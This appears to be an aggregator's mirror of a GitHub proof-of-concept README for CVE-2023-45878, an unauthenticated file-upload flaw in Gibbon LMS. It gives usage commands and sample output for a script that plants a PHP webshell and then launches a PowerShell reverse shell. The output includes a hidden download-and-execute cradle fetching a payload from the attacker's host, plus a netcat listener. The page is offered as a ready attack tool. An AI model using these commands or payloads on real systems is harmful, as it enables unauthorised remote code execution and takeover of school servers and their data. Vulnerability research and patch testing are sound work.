Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-45878 PoC — Gibbon 安全漏洞

Source
https://github.com/PaulDHaes/CVE-2023-45878-POC
Associated Vulnerability
Title:Gibbon 安全漏洞 (CVE-2023-45878)
Description:Gibbon是一个解决教育工作者每天遇到的实际问题的学校平台。 GibbonEdu Gibbon 25.0.1版本存在安全漏洞,该漏洞源于允许未经身份验证的攻击者将任意文件上传到应用程序,并在底层系统上执行代码。
Description
CVE-2023-45878 poc for gibbon LMS on xampp windows
Readme
# CVE-2023-45878-POC
CVE-2023-45878 poc for gibbon LMS on xampp windows.
Upload a webshell called shell.php for command injection.
For reverse shell uploads a powershell reverse shell ps1 script called shell.ps1 which is uploaded to the target machine using the shell.php.

# Requirments
Python3
Requests python3 module
netcat
```
pip3 install requests
```
## Virtual env
```shell
mkdir CVE-2023-45878
cd CVE-2023-45878
python3 -m venv CVE
source CVE/bin/activate
cd ..
pip3 install requests
```

# Usage
Tested on Gibbon LMS that was running in XAMPP windows no AV enabled.
Target can be found using the login page of Gibbon example http://gibbon-example/Gibbon-LMS/

## Reverse shell
```shell
python3 reverse.py --reverse-shell -target_url http://target -ip IP -port REV-PORT -srvport SRVPORT
```
### Result
```text
[+] PHP shell uploaded successfully to http://target/shell.php
[+] PowerShell reverse shell script saved to: shell.ps1
[+] The shell is now hosted at shell.ps1
Starting reverse shell listener in background...
Starting netcat listener on ip:REV-PORT...
[+] HTTP server running in the background on port SRVPORT
[+] Executing PHP shell to download and execute shell.ps1
Executing: http://target/shell.php?cmd=powershell%20-nop%20-w%20hidden%20-c%20IEX%20%28New-Object%20Net.WebClient%29.DownloadString%28%27http%3A//IP%3ASRVPORT/shell.ps1%27%29
[+] HTTP server started on http://0.0.0.0:SRVPORT/
TARGET-IP - - [20/Mar/2025 12:59:11] "GET /shell.ps1 HTTP/1.1" 200 -
Connection from TARGET-IP

PS C:\xampp\htdocs\Gibbon-LMS>
```

## Single command
```shell
python3 reverse.py --single -target_url http://target -command whoami
```
### Result
```text
[+] PHP shell uploaded successfully to http://target/shell.php
[+] Executing PHP command
Executing: http://target/shell.php?whoami
[+] Command executed successfully pres enter
vuln\w.webservice
```

# Credits
https://herolab.usd.de/security-advisories/usd-2023-0025/
File Snapshot

 [4.0K]  /data/pocs/9108c23b5dc95d7e0fc9ad4a533f8278713687f1
├── [6.6K]  CVE-2023-45878.py
└── [1.9K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.